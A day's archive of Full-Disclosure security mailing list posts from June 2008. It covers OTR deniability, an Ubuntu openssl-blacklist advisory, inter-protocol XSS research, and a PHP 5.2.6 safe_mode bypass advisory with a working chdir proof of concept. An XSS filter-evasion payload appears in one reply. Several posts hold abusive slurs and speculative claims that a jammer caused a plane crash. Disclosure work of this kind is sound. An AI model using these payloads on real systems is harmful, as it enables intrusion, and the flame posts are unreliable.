Re: [Full-disclosure] Skype chat encryption with OTR

2008-06-18 Thread Tonnerre Lombard
Salut, rawket,

On Thu, 19 Jun 2008 13:00:49 +1000, rawket wrote:
> There is no denying that an OTR conversation has been encrypted..
> It's because the private keys change ultra-frequently, and the keys
> are short lived that it provides the 'plausible deniability'

Not exactly. The plausible deniability is due to the fact that the
signature is executed using a symmetric key known to both parties, so
that either party (but no one else) could have sent the message.

Tonnerre
-- 
SyGroup GmbH
Tonnerre Lombard
Solutions Systematiques
Tel: +41 61 333 80 33    Güterstrasse 86
Fax: +41 61 383 14 67    4053 Basel
Web: www.sygroup.ch      [EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
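Worked example of Tonnerre's point, added here and not part of the original thread: the authentication tag is an HMAC under a MAC key that both ends derive from the same shared secret (the key derivation, the label string and the use of HMAC-SHA1 are assumptions of this demo, not OTR's actual construction). The recipient can verify the tag and an outsider cannot forge it, yet either party could have produced the identical tag, which is what makes the transcript deniable.

```python
import hashlib
import hmac
import secrets


def derive_mac_key(shared_secret: bytes) -> bytes:
    """Both parties derive the same MAC key from the shared secret produced by
    the key exchange (hypothetical KDF: SHA-256 over a labelled input)."""
    return hashlib.sha256(b"demo-mac-key" + shared_secret).digest()


def authenticate(mac_key: bytes, message: bytes) -> bytes:
    """Symmetric 'signature': an HMAC tag that anyone holding mac_key can compute."""
    return hmac.new(mac_key, message, hashlib.sha1).digest()


def verify(mac_key: bytes, message: bytes, tag: bytes) -> bool:
    """Constant-time comparison of the expected tag with the received one."""
    return hmac.compare_digest(authenticate(mac_key, message), tag)


def deniability_demo() -> dict:
    """Run the three checks that together make up the deniability argument."""
    # Constructed shared secret standing in for the Diffie-Hellman result.
    shared_secret = secrets.token_bytes(32)
    alice_key = derive_mac_key(shared_secret)
    bob_key = derive_mac_key(shared_secret)      # identical to alice_key

    msg = b"meet at 10"
    tag_from_alice = authenticate(alice_key, msg)

    # Bob verifies the tag, so he knows it came from the only other key holder.
    bob_accepts = verify(bob_key, msg, tag_from_alice)

    # Bob could have produced exactly the same tag himself, so the tag proves
    # nothing to a third party about which of the two wrote the message.
    tag_bob_could_make = authenticate(bob_key, msg)
    indistinguishable = hmac.compare_digest(tag_from_alice, tag_bob_could_make)

    # An outsider without the shared key cannot produce a tag Bob accepts.
    outsider_key = derive_mac_key(secrets.token_bytes(32))
    outsider_rejected = not verify(bob_key, msg, authenticate(outsider_key, msg))

    return {
        "bob_accepts": bob_accepts,
        "either_party_could_have_made_tag": indistinguishable,
        "outsider_rejected": outsider_rejected,
    }


if __name__ == "__main__":
    for name, result in deniability_demo().items():
        print(f"{name}: {result}")
```

Contrast this with an asymmetric signature (RSA or DSA over the message): a valid signature can only have been made with one private key, so a third party holding the transcript could later attribute every message to its author.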

Re: [Full-disclosure] Skype chat encryption with OTR

2008-06-18 Thread Fabio Pietrosanti (naif)
Are you willing to trust Skype encryption for your own confidential
material?

It obviously depends on the risk context and trust scenario.

I would never send any confidential material over a Skype chat, but only
over a channel where I have independent control over the information
encryption.

It would be nice to analyze some approach to make even the "voice" of Skype
end-to-end encrypted with an independent encryption module (applying
ZRTP or other crypto technologies), even if this one could be much more
difficult to achieve.

Cheers

Fabio/naif


Ureleet wrote:
> isn't skype encrypted anyway?



Re: [Full-disclosure] Skype chat encryption with OTR

2008-06-18 Thread rawket
Yeah, it's encrypted; public AND private keys are stored on Skype's server.
Although this is great, and provides the user with an encrypted
conversation (voice or text) wherever he/she is in the world, it means
all the keys are stored in one location and can be intercepted by either
Skype or the feds, heh...

>> end-to-end deniable encryption for Skype chat messages.

There is no denying that an OTR conversation has been encrypted. It's
because the private keys change ultra-frequently, and the keys are short
lived, that it provides the 'plausible deniability'.

Even with OTR, there's no need to send your private conversations through
Skype's servers. You should use OTR with a trusted Jabber server.



Re: [Full-disclosure] xss dot(.) filter evasion

2008-06-18 Thread Andrew Farmer
On 18 Jun 08, at 08:49, Thomas Pollet wrote:
> I came across this site that implemented some filtering so the dots were
> replaced by an underscore, also the quotes and backslash were escaped.
> I came up with the code below to bypass this filtering (write anything to
> the page using String.fromCharCode)
> Does someone know a different way to do this?

eval makes everything easy. Well, reasonably easy.

eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/)));



Re: [Full-disclosure] Coming soon : Firefox 3 Release overflow

2008-06-18 Thread Ureleet
is this the "lets set a world record for downloads, oh wait, we forgot
to buy the bandwidth to support that" overflow?

On Tue, Jun 17, 2008 at 10:20 PM, doulcet pierre <[EMAIL PROTECTED]> wrote:
> CRC32 : 898482c7
> MD5   : 801ed54c2ab948472584154ba5bec56e
> SHA-1 : 595ab2d95a433c8973d60245cb2b4d3857838605
> SHA-2 256 : 
> 0c70374063951c9f7eaf26cfe306c1e9773bbd84cb3a1396b3e0b1d633b4498a
>
> Firefox 3 Release, overflow.
>
> --
> [EMAIL PROTECTED]
> Proof-of-Concept.fr
>



Re: [Full-disclosure] Skype chat encryption with OTR

2008-06-18 Thread Ureleet
isn't skype encrypted anyway?

On Wed, Jun 18, 2008 at 5:11 AM, Fabio Pietrosanti (naif)
<[EMAIL PROTECTED]> wrote:
> For all you OS X guys that like Skype because of its usability but are
> concerned about the lack of an end-to-end message encryption system (a
> plug-in for Skype).
>
> Today I tried:
>
> #1 Get and install Adium (I suggest portable Adium in a separate
> FileVault volume)
> http://www.freesmug.org/portableapps/adium/
>
> #2 Get and install the Skype plug-in for Adium
> http://myjobspace.co.nz/images/pidgin/
>
> #3 Enable OTR encryption on Skype chat (through the Adium client)
> http://www.cypherpunks.ca/otr/
>
> Et voilà, end-to-end deniable encryption for Skype chat messages.
>
> The funny thing is that you can see the encrypted chat and key exchange
> in the standard Skype messaging window, so you can verify yourself that all
> the stuff is enciphered.
>
> Now I feel more comfortable and will sleep +10 minutes each night.
>
> Cheers
>
> Fabio/naif
>



Re: [Full-disclosure] Fwd: Comments on: Internet-connected coffee maker has security holes

2008-06-18 Thread Ureleet
I'd love to see n3td3v dos a coffee maker.  hell, I'd love to see
n3td3v dos anything.

On Tue, Jun 17, 2008 at 6:14 PM, T Biehn <[EMAIL PROTECTED]> wrote:
> When no one was looking, you brewed forty pots of coffee. You brewed
> 40 pots of coffee. That's as many as four tens.
> And the Feds know you're terrible.
>
> On Tue, Jun 17, 2008 at 4:31 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>> -- Forwarded message --
>> From: n3td3v <[EMAIL PROTECTED]>
>> Date: Tue, Jun 17, 2008 at 9:27 PM
>> Subject: Comments on: Internet-connected coffee maker has security holes
>> To: n3td3v <[EMAIL PROTECTED]>
>>
>>
>> by n3td3v  June 17, 2008 1:22 PM
>>
>> "This is why connecting everything to the internet is a terrible
>> idea." Yeah, but the intelligence services love it; they embrace it.
>> The amount of information being collected over the internet by them
>> has reached an all-time high; the intelligence services are in their
>> zone with the information collecting capability that's going on. If
>> the government didn't like everything connected to the internet, there
>> would have been a clamp down long ago. In fact the government loves the
>> internet and hopes everything can be internet connected soon. GCHQ and
>> NSA will need to build bigger data warehouses to store everything, but
>> that's not a drawback for them; it's an investment when you start to see
>> the amount of searchable data being collected about everyone and
>> stored on the intelligence services' databases that top spies can
>> access from anywhere in the world just like consumers can with Google
>> search, except the intelligence services' searches don't come up with
>> the next train to catch; they come up with the next terrorist to catch
>> instead. All the best, n3td3v
>>
>> http://news.cnet.com/8601-10784_3-9970757.html?communityId=2066&targetCommunityId=2066&messageId=741397#741397
>>
>



Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

2008-06-18 Thread Ureleet
joel -- i told u not to respond, you didnt listen, damn it..  i dont
know how much you know about n3td3v, but he tries to make his own name
off of other pplz fame and work.  take web application security day.
take the day he went off on hd moore.  take any day, ever.  hes just
jumping on your coattails and riding you for all you are worth now.
fukin ignore him.

n3td3v -- you fuckin douche, get a job.  quit trying to ride joels
dick like you tried to ride everyone elses on your little web
application day (oh by the way, how did that go for you?), or hd
moores dick.  you dont work for anyone, you dont know shit, you are
plainly ranting about whatever and whoever.  find some REAL security
issues to talk about, and we will gladly participate with you.  mi5
doesnt care.  you suck.  go hang.

On Wed, Jun 18, 2008 at 4:26 PM, n3td3v <[EMAIL PROTECTED]> wrote:
> On Wed, Jun 18, 2008 at 5:56 PM, Joel Esler <[EMAIL PROTECTED]> wrote:
>> On Jun 18, 2008, at 12:26 PM, n3td3v wrote:
>>
>> Joel Esler said he doesn't switch his phone off on flights and that
>> anyone who is on a plane with him should watch out.
>>
>> First of all, I said "before I got the iPhone with the 'airplane' mode". I'd
>> forget to turn off my phone a lot; I'd throw it in my briefcase when I'd go
>> through security, and forget it's in there.  Heck, I've seen people actually
>> be able to receive calls on their crackberries while in mid flight.  Not
>> that they answered them.  But I've seen the phones ring.  I have an iPhone
>> now; I place it in airplane mode when I get on a flight.
>
> Why did you tell people to be careful when you're on a flight? Does
> that mean you're planning to fly again with your device turned on and
> that you suspect it will mess with the plane's electronics?
>
>> There are actually studies going on RIGHT NOW to see if phones can be
>> allowed to be used during flights by the FCC/FAA, and in other countries as
>> well.
>
> I hope they consider this incident before making up their mind...
>
> They (experts) suspect a radio frequency messed with the electronics,
> one that was being used by MI5 to block mobile phone signals.
>
> "An official probe into the Heathrow crash has focused on the high-tech
> jamming device which shields Gordon Brown from terrorist attack.
>
> When the Boeing 777 crashed on January 17 it passed just feet above
> the Prime Minister's official car as he was driven to the airport to
> board a flight to Beijing.
>
> Inside the car is a jammer which broadcasts radio signals 100 times
> more powerful than a mobile phone.
>
> The device is designed to block signals which MI5 say terrorists use
> to blow up remote-control bombs."
>
> http://www.sundaymirror.co.uk/news/sunday/2008/04/27/gordon-bown-in-a-jam-98487-20396286/
>
> "WASHINGTON — A total electronics failure reportedly occurred before
> the crash of a British Airways 777 at London's Heathrow Airport on
> Thursday (Jan. 17).
> All 136 passengers and 16 crew members escaped from the British
> Airways flight from Beijing. The BBC reported that 13 passengers were
> injured.
>
> An airport worker told the BBC that the pilot of the Boeing 777 lost
> all power, and had to glide the plane to a landing. The plane's
> landing gear collapsed after crash landing.
>
> The BBC said the airport worker was told by the pilot that all
> aircraft electronics had failed and that the crew had no warning of a
> problem. "It just went," the worker was quoted as saying. "It's a
> miracle. The [pilot] deserves a medal as big as a frying pan."
>
> http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=205900406
>
> "Computer glitch: This happened with a Malaysian Airlines 777 and a
> former 777 captain told The Sunday Times that for both engines to fail
> at the same time "it has got to be commanded" - ie, it was computer
> error in controlling the engines. Verdict: possible and many experts'
> prime concern "
>
> http://www.timesonline.co.uk/tol/news/uk/article3216746.ece
>
> "The British Airways plane that crash landed at Heathrow today was a
> Boeing 777 - currently regarded as the safest aeroplane in the world
> by aviation experts.
>
> The plane has only been in use for seven years and is the first
> aircraft of its kind to have been designed by computers and boasts the
> latest "avionic and navigational systems".
>
> The Boeing 777 has a number of variant models - such as the 777-200ER
> and 777-300ER - but all the models being flown around the world
> currently have a clean safety record."
>
> http://www.dailymail.co.uk/news/article-508869/Boeing-777-crash-landed-Heathrow-safest-aeroplanes-world-say-experts.html
>
>> Personally I hope this doesn't go through, as I don't want to be sitting
>> next to some dude during my 100,000+ miles I fly a year to hear yacking the
>> whole flight.
>>
>
> I'd be more concerned about terrorists using the phone to trigger some
> kind of security vulnerability with the planes electronics than having
> my sleep disturbed by a s

[Full-disclosure] Fwd: fag

2008-06-18 Thread Ureleet
what a serious researcher.


-- Forwarded message --
From: n3td3v <[EMAIL PROTECTED]>
Date: Wed, Jun 18, 2008 at 5:48 PM
Subject: fag
To: Ureleet <[EMAIL PROTECTED]>


you're such a wee pubic hair that no one is listening to and who i
won't respond to in public mailing lists anymore.

your hay day is over cock sucker, you ain't getting anymore public
responses from me.

all the best,

n3td3v



Re: [Full-disclosure] The Extended HTML Form attack revisited

2008-06-18 Thread kuza55
Hi,

Just thought I'd let you know that Wade Alcorn wrote a similar paper
in 2006: http://www.bindshell.net/papers/ipc (Using IMAP3 too), but of
course things have changed since then (namely this attack not working
against Firefox 2 or 3).

Also, there is a complete list of ports that Firefox blocks here:
http://www.mozilla.org/projects/netlib/PortBanning.html (which Wade's
paper references), and the default protocol handlers which can speak
to the blocked ports. Do you know if there's a list of ports published
by Microsoft/Opera/Apple about which ports are blocked in their
browsers? If not, would you be able to publish the ports you found
blocked in an appendix (I'm sure it wouldn't be too much code to whip
up to test it, but if you've already done so then there's no point in
duplicating work)?

I also did some digging myself and found that the reason Firefox
doesn't render the response as HTML is because it searches for the
string "http" (case-insensitive, no quotes) in the first 8 bytes of
the response; if you can satisfy that condition somehow then you can
still get it to happen, but of course that seems pretty unlikely.

IE also tries to search for a string, in this case "http/"
(case-insensitive, no quotes) in the first 1024 bytes, but only so
that it can identify http headers, so if you can inject data into the
first 1024 bytes of the response you can inject headers to do cache
poisoning, etc. (You can probably do header injection against Firefox
if you can trigger this, but the problem is of course triggering it on
Firefox)

 - kuza55

2008/6/19 Sandro Gauci <[EMAIL PROTECTED]>:
> Hi -
>
> Back in 2002 I had published details of a vulnerability affecting most
> web browsers. It detailed a security flaw that allows attackers to
> abuse non-HTTP protocols to launch Cross Site Scripting attacks even
> when a target web application was not vulnerable to XSS.
>
> Six years later I'm releasing an update to this research in this
> paper. This security vulnerability still affects popular web browsers
> nowadays and the following browsers were tested as vulnerable:
>
>   * Internet Explorer 6
>   * Internet Explorer 7
>   * Internet Explorer 8 (beta 1)
>   * Opera 9.27
>   * Opera 9.50
>   * Safari 1.32
>   * Safari 3.1.1
>
> Others have described how to abuse behavior for purposes other than
> Cross Site Scripting. NGSSoftware previously published a paper called
> "Inter-Protocol Exploitation" which references the original EyeonSecurity 
> paper.
>
> Paper at:
> http://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf
>
> or http://tinyurl.com/5d88ll
>
> --
> Sandro Gauci
> EnableSecurity
> Web: http://enablesecurity.com/
>



[Full-disclosure] [USN-612-11] openssl-blacklist update

2008-06-18 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-612-11  June 18, 2008
openssl-blacklist update
http://www.ubuntu.com/usn/usn-612-1
http://www.ubuntu.com/usn/usn-612-3
http://www.ubuntu.com/usn/usn-612-8
http://www.ubuntu.com/usn/usn-612-9
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  openssl-blacklist   0.3.3+0.4-0ubuntu0.6.06.2
  openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.6.06.2

Ubuntu 7.04:
  openssl-blacklist   0.3.3+0.4-0ubuntu0.7.04.2
  openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.7.04.2

Ubuntu 7.10:
  openssl-blacklist   0.3.3+0.4-0ubuntu0.7.10.2
  openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.7.10.2

Ubuntu 8.04 LTS:
  openssl-blacklist   0.3.3+0.4-0ubuntu0.8.04.3
  openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.8.04.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-612-3 addressed a weakness in OpenSSL certificate and key
generation and introduced openssl-blacklist to aid in detecting
vulnerable certificates and keys. This update adds RSA-4096
blacklists to the openssl-blacklist-extra package and adjusts
openssl-vulnkey to properly handle RSA-4096 and higher moduli.

Original advisory details:
 A weakness has been discovered in the random number generator used
 by OpenSSL on Debian and Ubuntu systems. As a result of this
 weakness, certain encryption keys are much more common than they
 should be, such that an attacker could guess the key through a
 brute-force attack given minimal knowledge of the system. This
 particularly affects the use of encryption keys in OpenSSH, OpenVPN
 and SSL certificates.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2.dsc
  Size/MD5:  676 ec900c22df66e7da2543082d7123aed7

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2.tar.gz
  Size/MD5: 32928890 ff8a69186860a3c9bc78c86b51993154

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.6.06.2_all.deb
  Size/MD5:  6317974 c71f0e9dfaf87712672fb52acb55db0d

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2_all.deb
  Size/MD5:  6333018 e43b4ea20935655041e803064cee6626

Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2.dsc
  Size/MD5:  812 71e900154130bd20b4401b6ac2653cdc

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2.tar.gz
  Size/MD5: 32928996 37d24b96159aca653515a8aa136f31d3

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.7.04.2_all.deb
  Size/MD5:  6318082 cc4e2c235c71d36653ce1c2ef1b247bc

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2_all.deb
  Size/MD5:  6332858 d805a05a0bc674c064256cf26f231881

Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2.dsc
  Size/MD5:  812 b62d9f57a2c6f4e3e671a3d9648b1df1

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2.tar.gz
  Size/MD5: 32928995 8717c32922e43aaaf7203ccd268b99a8

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.7.10.2_all.deb
  Size/MD5:  6318232 81e856d987468e3fc3a0d6e7e21bf532

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2_all.deb
  Size/MD5:  6332724 84087c5b3d5a05cf55d415adaf6974f1

Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.8.04.3.dsc
  Size/MD5:  943 c1d37d2d4a36ba178022fc27ff6a0bdc

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.8.04.3.tar.gz
  Size/MD5: 32929040 376d57551e6859b39c2e795284978233

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/open
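As an added illustration of what this update does (example code written for this page, not the openssl-blacklist package's own openssl-vulnkey): a blacklist lookup keyed on the modulus bit length, where a key size that has no blacklist is reported as unchecked rather than silently passed. The fingerprint computation below is an assumption made for the demo, not a statement about the real blacklist file format, and the moduli are constructed numbers of the right bit length, not real RSA keys.

```python
import hashlib


def modulus_fingerprint(modulus: int) -> str:
    """Fingerprint used by this demo (an assumption, not the real file format):
    SHA-1 over the 'Modulus=<HEX>' line that `openssl rsa -noout -modulus`
    prints, keeping the last 20 hex characters."""
    line = f"Modulus={modulus:X}\n".encode("ascii")
    return hashlib.sha1(line).hexdigest()[20:]


def load_blacklist(text: str) -> set:
    """One fingerprint per line, '#' comment lines and blanks ignored
    (constructed format for the demo)."""
    return {ln.strip().lower() for ln in text.splitlines()
            if ln.strip() and not ln.strip().startswith("#")}


def check_rsa_key(modulus: int, blacklists: dict) -> str:
    """blacklists maps a modulus bit length (1024, 2048, 4096, ...) to the
    set of blacklisted fingerprints for that size.

    Returns 'weak' (fingerprint listed), 'ok' (size covered, not listed) or
    'unchecked' (no list for that size). Reporting the last case explicitly,
    instead of letting the key through, is the point: the USN text says the
    earlier openssl-vulnkey did not properly handle RSA-4096 and higher moduli."""
    bits = modulus.bit_length()
    if bits not in blacklists:
        return "unchecked"
    return "weak" if modulus_fingerprint(modulus) in blacklists[bits] else "ok"


def demo() -> dict:
    """Walk through the situation before and after an RSA-4096 list is added."""
    # Constructed moduli of the right bit lengths; not real RSA keys.
    weak_2048 = (1 << 2047) | 0x10001
    fine_2048 = (1 << 2047) | 0x10003
    some_4096 = (1 << 4095) | 0x10001

    # The 2048-bit list names weak_2048; there is no 4096-bit list yet.
    lists = {2048: load_blacklist("# RSA-2048 blacklist (constructed)\n"
                                  + modulus_fingerprint(weak_2048) + "\n")}
    before = check_rsa_key(some_4096, lists)

    # The update ships an RSA-4096 list (empty in this demo), so 4096-bit
    # keys are now actually covered instead of falling through.
    lists[4096] = load_blacklist("# RSA-4096 blacklist (constructed, empty)\n")
    return {
        "weak_2048": check_rsa_key(weak_2048, lists),
        "fine_2048": check_rsa_key(fine_2048, lists),
        "4096_before_update": before,
        "4096_after_update": check_rsa_key(some_4096, lists),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

Whatever the scanner's real fingerprint format, the design lesson is the same: a checker that has no data for an input should say so, not answer "not weak".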

Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

2008-06-18 Thread n3td3v
On Wed, Jun 18, 2008 at 5:56 PM, Joel Esler <[EMAIL PROTECTED]> wrote:
> On Jun 18, 2008, at 12:26 PM, n3td3v wrote:
>
> Joel Esler said he doesn't switch his phone off on flights and that
> anyone who is on a plane with him should watch out.
>
> First of all, I said "before I got the iPhone with the 'airplane' mode". I'd
> forget to turn off my phone a lot; I'd throw it in my briefcase when I'd go
> through security, and forget it's in there.  Heck, I've seen people actually
> be able to receive calls on their crackberries while in mid flight.  Not
> that they answered them.  But I've seen the phones ring.  I have an iPhone
> now; I place it in airplane mode when I get on a flight.

Why did you tell people to be careful when you're on a flight? Does
that mean you're planning to fly again with your device turned on and
that you suspect it will mess with the plane's electronics?

> There are actually studies going on RIGHT NOW to see if phones can be
> allowed to be used during flights by the FCC/FAA, and in other countries as
> well.

I hope they consider this incident before making up their mind...

They (experts) suspect a radio frequency messed with the electronics,
one that was being used by MI5 to block mobile phone signals.

"An official probe into the Heathrow crash has focused on the high-tech
jamming device which shields Gordon Brown from terrorist attack.

When the Boeing 777 crashed on January 17 it passed just feet above
the Prime Minister's official car as he was driven to the airport to
board a flight to Beijing.

Inside the car is a jammer which broadcasts radio signals 100 times
more powerful than a mobile phone.

The device is designed to block signals which MI5 say terrorists use
to blow up remote-control bombs."

http://www.sundaymirror.co.uk/news/sunday/2008/04/27/gordon-bown-in-a-jam-98487-20396286/

"WASHINGTON — A total electronics failure reportedly occurred before
the crash of a British Airways 777 at London's Heathrow Airport on
Thursday (Jan. 17).
All 136 passengers and 16 crew members escaped from the British
Airways flight from Beijing. The BBC reported that 13 passengers were
injured.

An airport worker told the BBC that the pilot of the Boeing 777 lost
all power, and had to glide the plane to a landing. The plane's
landing gear collapsed after crash landing.

The BBC said the airport worker was told by the pilot that all
aircraft electronics had failed and that the crew had no warning of a
problem. "It just went," the worker was quoted as saying. "It's a
miracle. The [pilot] deserves a medal as big as a frying pan."

http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=205900406

"Computer glitch: This happened with a Malaysian Airlines 777 and a
former 777 captain told The Sunday Times that for both engines to fail
at the same time "it has got to be commanded" - ie, it was computer
error in controlling the engines. Verdict: possible and many experts'
prime concern "

http://www.timesonline.co.uk/tol/news/uk/article3216746.ece

"The British Airways plane that crash landed at Heathrow today was a
Boeing 777 - currently regarded as the safest aeroplane in the world
by aviation experts.

The plane has only been in use for seven years and is the first
aircraft of its kind to have been designed by computers and boasts the
latest "avionic and navigational systems".

The Boeing 777 has a number of variant models - such as the 777-200ER
and 777-300ER - but all the models being flown around the world
currently have a clean safety record."

http://www.dailymail.co.uk/news/article-508869/Boeing-777-crash-landed-Heathrow-safest-aeroplanes-world-say-experts.html

> Personally I hope this doesn't go through, as I don't want to be sitting
> next to some dude during my 100,000+ miles I fly a year to hear yacking the
> whole flight.
>

I'd be more concerned about terrorists using the phone to trigger some
kind of security vulnerability in the plane's electronics than having
my sleep disturbed by a single mom or retired couple muttering away on
the phone.

I think all gadgets and gizmos should be banned from flights in case of
0-day vulnerabilities that are unknown about and cause a system
failure.

> Is this some kind of dry american humour that i'm missing here or is
> that not even funny?
>
> yes, It was a joke.  Sorry if it was in bad taste.
>

If it had just been a joke in a bar it might be funny, but it was a joke
during a Sans Internet Storm Center podcast on a segment about
Bluetooth vulnerabilities, and you and your co-workers were just
laughing and joking like you were in a bar about leaving your phone
on and telling people to be careful if they were on the same flight as
you.

Even if I overheard you telling that joke in a bar I would probably
walk over and question you about it, or possibly just call the police.

If you had made the same joke at the airport terminal and an airport
official had overheard you, in Britain you would have been arrested by
anti-terrorism police... I don

[Full-disclosure] spyware in smplayer_portable.exe found in MPUI.2008-06-16.Full-Package.exe ?

2008-06-18 Thread Dr. Mark A. Baiter [Chief Scatological Consultant]
Hi there lord_mulder,

I wanted to report some spyware-like behavior of smplayer_portable.exe.

I have just downloaded MPUI.2008-06-16.Full-Package.exe from
http://mulder.dummwiedeutsch.de/home/?page=projects#mplayer
and installed it completely - codecs + mplayer + smplayer.

On running smplayer_portable.exe it tries to connect to the internet,
to the host rautemusik.g24m.net, without me opening any file such as an
internet radio station or anything else.

Is this behavior normal? If yes, then please tell me what data
rautemusik.g24m.net is gathering from my computer.
Please investigate this - perhaps the smplayer_portable.exe that you
got is infected with some kind of spyware.
Can you please tell me where you got the version of
smplayer_portable.exe that you included in
MPUI.2008-06-16.Full-Package.exe?



[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass

2008-06-18 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

chdir - Change directory

SYNOPSIS:

bool chdir  ( string $directory  )

http://pl.php.net/manual/en/function.chdir.php


ftok - Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok  ( string $pathname  , string $proj  )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's look at the chdir() function:

- ---
PHP_FUNCTION(chdir)
{
	char *str;
	int ret, str_len;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
		RETURN_FALSE;
	}

	/* safe_mode uid check and open_basedir check, both on the raw string;
	   as noted below, the uid check ignores paths with an http:// prefix */
	if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
		RETURN_FALSE;
	}
	ret = VCWD_CHDIR(str);

	if (ret != 0) {
		php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
- ---

str is being checked by safe_mode.
Example:

- ---
Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 
is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
- ---

If we create a subdirectory named "http:" in the current directory, it becomes
possible to call chdir("http://../../../../../../")
and we end up in /.

Why?

TRUE == ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR))
|| php_check_open_basedir(str TSRMLS_CC))

for
str="http://../../../../../../"

safe_mode will ignore all paths with http://

The same situation occurs with the ftok() function (and more).

- ---EXAMPLE1---
cxib# cat /www/wufff.php
<?php
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
- -rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 
is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
- ---/EXAMPLE1---

- ---EXAMPLE2---
cxib# ls -la /www/wufff.php
- -rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?php
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
- ---/EXAMPLE2---

!!! WARNING !!!
